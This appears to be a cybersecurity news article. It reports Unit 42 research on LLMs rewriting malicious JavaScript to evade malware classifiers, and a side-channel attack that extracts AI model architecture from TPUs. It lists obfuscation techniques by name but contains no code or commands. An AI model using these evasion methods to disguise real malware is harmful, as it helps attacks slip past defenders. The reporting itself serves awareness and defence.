AI Capable of Generating 10,000 Distinct Malware Variants, Evading Detection in 88% of Cases

Cybersecurity experts have unearthed a disturbing capability within large language models (LLMs): the ability to mass-produce transformed iterations of malicious JavaScript code that deftly elude detection mechanisms.

“While LLMs may falter at crafting malware from the ground up, cybercriminals are leveraging these systems to obfuscate and refine existing malicious scripts, making detection exponentially more difficult,” stated researchers at Palo Alto Networks’ Unit 42 in their latest report. “The linguistic transformations enabled by LLMs are markedly sophisticated, rendering the malicious code indistinguishable from legitimate scripts.”

This iterative obfuscation technique, over time, has the insidious potential to degrade the efficacy of malware detection algorithms, coaxing them into misclassifying malicious scripts as harmless.

Despite the bolstered safeguards implemented by LLM providers to deter misuse, malicious actors are employing tools like WormGPT to automate phishing campaigns tailored to specific victims and to develop unique strains of malware. In October 2024, OpenAI revealed it had thwarted over 20 covert operations that sought to exploit its platform for reconnaissance, vulnerability testing, script generation, and debugging assistance.

Unit 42 demonstrated how LLMs can systematically rewrite existing malware samples, effectively sidestepping machine learning-based detection models such as Innocent Until Proven Guilty (IUPG) and PhishingJS. This methodology facilitated the creation of 10,000 distinct JavaScript variants while preserving their original malicious intent.

Obfuscation Techniques That Fuel Malware Proliferation

The adversarial rewriting process employs several sophisticated methods, including:

Renaming variables to obscure their original purpose.
Splitting strings to hinder recognition.
Injecting superfluous “junk” code to camouflage malicious segments.
Eliminating redundant whitespace for added stealth.
Reconstructing code entirely to simulate authenticity.

These transformations yield variants that maintain the original functionality but significantly diminish their detectability. According to Unit 42, these rewrites altered the verdict of their own malware classifier from “malicious” to “benign” in an alarming 88% of instances.

Even more troubling, these reformulated JavaScript artifacts successfully evaded scrutiny by other malware detection platforms, including VirusTotal.

Natural-Looking Code as a Cloaking Mechanism

A unique advantage of LLM-enabled obfuscation is the “naturalness” of the resulting code. Unlike libraries such as obfuscator.io, which often produce detectable and formulaic patterns, LLM-generated rewrites mimic genuine coding styles, making them harder to flag or fingerprint.

“The scalability of generating new malicious code variants increases dramatically with generative AI,” the researchers noted. “However, these same tactics can also be harnessed to generate robust datasets for training detection systems to better counteract such threats.”

Emerging Threats: Model Theft via TPUXtract

In parallel, academics from North Carolina State University have unveiled TPUXtract, a side-channel attack capable of conducting model-theft operations against Google’s Tensor Processing Units (TPUs) with a staggering 99.91% precision. This technique poses significant risks, including intellectual property exfiltration and cascading cyberattacks.

By capturing electromagnetic emissions during neural network computations, TPUXtract gleans sensitive hyperparameters such as:

Layer types and configurations.
Number of nodes and filters.
Kernel dimensions and activation functions.

This sophisticated black-box approach enables adversaries to reconstruct a functional replica—or close approximation—of the target AI model. However, executing such an attack necessitates physical proximity to the TPU device and access to costly hardware to analyze the signals.

“We successfully extracted the architectural blueprints and recreated high-level features of the AI,” stated Aydin Aysu, one of the study’s authors. “Using this intelligence, we reproduced an operational surrogate model that closely mirrors the original.”

Implications for the Future

As LLMs and advanced computational systems continue to evolve, their dual-use capabilities pose profound challenges to cybersecurity frameworks. While these tools unlock transformative potential in legitimate domains, they simultaneously empower malicious actors to innovate new vectors of attack, necessitating a commensurate evolution in defensive technologies.

Cyber security news for all

New PondRAT Malware Disguised in Python Packages Targets Software Developers

Discord Unveils DAVE Protocol for Comprehensive Encryption in Audio and Video Communication

GitLab Resolves Critical SAML Authentication Bypass Vulnerability in CE and EE Versions

SpyLoan Malware Embedded in Android Loan Apps Exposes 8 Million Users

Google Halts Risky Android App Sideloading in India, Elevating Fraud Prevention

Watering Hole Attack on Kurdish Platforms Unleashes Harmful APKs and Spyware

Obfuscation Techniques That Fuel Malware Proliferation

Natural-Looking Code as a Cloaking Mechanism

Emerging Threats: Model Theft via TPUXtract

Implications for the Future

Related

Recent Articles

The Hidden Risk of Non-Human Identities: Why Secrets Management Must Evolve

New Malware Campaigns Target Android and iOS Users with Fake Apps

Weekly Cyber Threat Insights: Windows 0-Day, VPN Exploits, AI Abuse, Antivirus Hijacking, and More

New BPFDoor Malware Controller Facilitates Hidden Lateral Movement on Linux Systems

New Vulnerabilities Found in Rack::Static Allow Unauthorized Access and Data Manipulation on Ruby Servers

Related Stories

EDITOR PICKS

The Hidden Risk of Non-Human Identities: Why Secrets Management Must Evolve

New Malware Campaigns Target Android and iOS Users with Fake Apps

Weekly Cyber Threat Insights: Windows 0-Day, VPN Exploits, AI Abuse, Antivirus Hijacking, and More

POPULAR POSTS

A complete OSINT tutorial on finding someone’s personal information

Chaos Computer Club discovered access to 5 million records

Mailto links can pose an unexpected security risk

ABOUT US

POPULAR CATEGORY

FOLLOW US